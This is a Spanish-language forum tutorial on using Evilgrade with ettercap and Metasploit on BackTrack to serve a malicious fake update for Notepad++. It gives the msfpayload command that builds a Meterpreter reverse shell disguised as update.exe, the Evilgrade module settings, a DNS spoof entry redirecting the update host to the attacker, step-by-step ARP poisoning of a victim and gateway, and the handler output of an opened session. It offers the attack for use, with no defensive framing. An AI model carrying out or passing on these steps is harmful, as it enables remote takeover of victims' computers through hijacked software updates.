Empezemos otra vez...
Bueno Evilgrade para mí es una herramienta que nos permite hacer que los programas de un sistema cuando necesitan ser actualizados, al hacer update, en vez de hacerlo desde su host, lo haga desde nuestro host donde está alojado el payload.
Explicado de otra manera, cuando tu vas a actualizar tu windows, en vez de descargar los archivos de actualización, descargas el payload.
Actualmente creo que dispone de 63 módulos:
Código: Seleccionar todo
evilgrade>show modules
List of modules:
===============
allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 63 modules available.
Y el sistema que estoy usando es Backtrack 5 R1.
Primero creemos nuestro payload
Código: Seleccionar todo
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4444 X > /root/Desktop/update.exe
Código: Seleccionar todo
evilgrade>configure notepadplus
Código: Seleccionar todo
evilgrade(notepadplus)>show options
Código: Seleccionar todo
evilgrade(notepadplus)>set agent '["<%OUT%>/root/Desktop/update.exe<%OUT%>"]'
Código: Seleccionar todo
evilgrade(notepadplus)>show options
Display options:
===============
Name = notepadplus
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = "The notepad++ use GUP generic update process so it''s boggy too."
VirtualHost = "evilgrade(notepadplus)>show options
Display options:
===============
Name = notepadplus
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = "The notepad++ use GUP generic update process so it''s boggy too."
VirtualHost = "notepad-plus.sourceforge.net"
.----------------------------------------------.
| Name | Default | Description |
+--------+-------------------+-----------------+
| enable | 1 | Status |
| agent | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'
"
.----------------------------------------------.
| Name | Default | Description |
+--------+-------------------+-----------------+
| enable | 1 | Status |
| agent | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'
escribimos:
Código: Seleccionar todo
evilgrade(notepadplus)>start
vamos a la siguiente ruta:
Código: Seleccionar todo
/usr/share/ettercap/
buscamos donde diga
Código: Seleccionar todo
www.microsoft.com PTR 192.168.168.56
Código: Seleccionar todo
notepad-plus.sourceforge.net A 192.168.1.33
Código: Seleccionar todo
www.microsoft.com PTR 192.168.168.56
notepad-plus.sourceforge.net A 192.168.1.33
Seguido abrimos la consola y escribimos
Código: Seleccionar todo
root@bt:~# ettercap -G
1º Sniff > unefied sniffing > aceptamos
2º Plugins > manage plugins > clicamos en dns_spoof y lo marcamos
3º Hosts > scan for hosts > aceptamos
4º Hosts > hosts list
5º A la puerta de enlace predeterminada (en mi caso 192.168.1.1) le asignamos Target 1, y a la IP víctima le asignamos Target 2
6º Mitm > arp poising > marcamos la primera opcion > aceptamos
7º Start > Sniffing
AHora vamos a la consola de metasploit y lo ponemos a escuchar
Código: Seleccionar todo
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
Código: Seleccionar todo
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
INFO
[*][/color]Descarga ettercap: [Enlace externo eliminado para invitados]
[*][/color]Descarga evilgrade: [Enlace externo eliminado para invitados]
_______
Bueno pues creo que esto es todo, si me equivoqué en algo o tienen alguna duda, haganlo saber
Saludos